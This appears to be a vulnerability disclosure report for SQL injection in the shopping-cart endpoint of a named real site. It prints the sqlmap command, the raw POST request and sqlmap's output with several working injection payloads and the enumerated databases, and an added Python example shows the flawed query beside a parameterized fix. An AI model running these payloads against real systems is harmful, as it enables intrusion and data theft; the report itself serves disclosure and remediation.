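2015-12-21: Details reported to the vendor; awaiting vendor handling
2015-12-21: Vendor confirmed; details disclosed to the vendor only
2015-12-31: Details disclosed to core white hats and experts in related fields
2016-01-10: Details disclosed to regular white hats
2016-01-20: Details disclosed to intern white hats
2016-02-01: Details disclosed to the public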
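What kind of rhythm swings the most? What kind of singing is the most joyful?

I removed the cookie. To verify, log in first, copy your cookie into this request, and then run sqlmap against it:

sqlmap.py -r 1.txt --dbs --dbms=mysql --string="ouak6v3z1447067466"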

POST http://shop.9you.com/cart/info HTTP/1.1
Host: shop.9you.com
Connection: keep-alive
Content-Length: 46
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://shop.9you.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://shop.9you.com/cart/index
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie:

cart_type=mb&item_key[]=ouak6v3z1447067466*

sqlmap identified the following injection points with a total of 41 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cart_type=mb&item_key[]=ouak6v3z1447067466') AND 4709=4709 AND ('tWvx'='tWvx

    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
    Payload: cart_type=mb&item_key[]=ouak6v3z1447067466');(SELECT * FROM (SELECT(SLEEP(5)))QGkB)#

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: cart_type=mb&item_key[]=ouak6v3z1447067466') AND (SELECT * FROM (SELECT(SLEEP(5)))GlAU) AND ('xGKb'='xGKb

    Type: UNION query
    Title: Generic UNION query (NULL) - 23 columns
    Payload: cart_type=mb&item_key[]=ouak6v3z1447067466') UNION ALL SELECT NULL,CONCAT(0x716b766a71,0x426970725a4f4a46434a,0x71707a6b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
---
web application technology: PHP 5.3.29
back-end DBMS: MySQL 5.0.11

web application technology: PHP 5.3.29
back-end DBMS: MySQL >= 5.0.0
available databases [4]:
[*] aushop
[*] information_schema
[*] mysql
[*] test

Database: aushop
[267 tables]

Filter the input.
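
The payloads above all begin with `')`, which means each `item_key[]` value is pasted into the SQL text inside `('...')`. The added example below (not part of the original report, and not the vendor's code) puts that pattern beside an allow-list filter and a parameterized query. It uses Python's sqlite3 as a stand-in for the PHP/MySQL back end; the table, its columns and the key format are assumptions.

```python
import re
import sqlite3

# Assumed key format, modelled on the sample item_key in the report.
KEY_RE = re.compile(r"[a-z0-9]{1,32}")


def make_db():
    """Constructed stand-in for the shop's cart table (hypothetical schema)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE cart_info (item_key TEXT, cart_type TEXT, owner TEXT)")
    db.executemany(
        "INSERT INTO cart_info VALUES (?, ?, ?)",
        [("ouak6v3z1447067466", "mb", "alice"), ("k2", "mb", "bob")],
    )
    return db


def lookup_concat(db, cart_type, item_keys):
    """Before: request values are pasted into the SQL text inside ('...')."""
    sql = "SELECT owner FROM cart_info WHERE cart_type = '%s' AND item_key IN ('%s')" % (
        cart_type, "','".join(item_keys))
    return [row[0] for row in db.execute(sql)]


def validate_keys(item_keys):
    """Allow-list filter: reject the request if any key has unexpected characters."""
    bad = [k for k in item_keys if not KEY_RE.fullmatch(k)]
    if bad:
        raise ValueError("rejected %d malformed item_key value(s)" % len(bad))
    return list(item_keys)


def lookup_param(db, cart_type, item_keys):
    """After: one placeholder per array element; values never reach the SQL parser."""
    if not item_keys:  # "IN ()" is a syntax error, so answer directly
        return []
    marks = ",".join("?" for _ in item_keys)
    sql = "SELECT owner FROM cart_info WHERE cart_type = ? AND item_key IN (%s)" % marks
    return [row[0] for row in db.execute(sql, [cart_type, *item_keys])]


# Boolean-based payload shape quoted in the sqlmap output above.
PAYLOAD = "ouak6v3z1447067466') AND 4709=4709 AND ('tWvx'='tWvx"

if __name__ == "__main__":
    db = make_db()
    print(lookup_concat(db, "mb", [PAYLOAD]))   # injected condition is evaluated
    print(lookup_param(db, "mb", [PAYLOAD]))    # payload is compared as a plain string
```

Filtering alone depends on the pattern being right for every caller, so the parameterized query is the control that removes the injection point; the allow-list is a second layer that also produces a clean rejection to log.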
Severity: High
Vulnerability Rank: 20
Confirmed: 2015-12-21 16:42
Thank you very much.
None for now.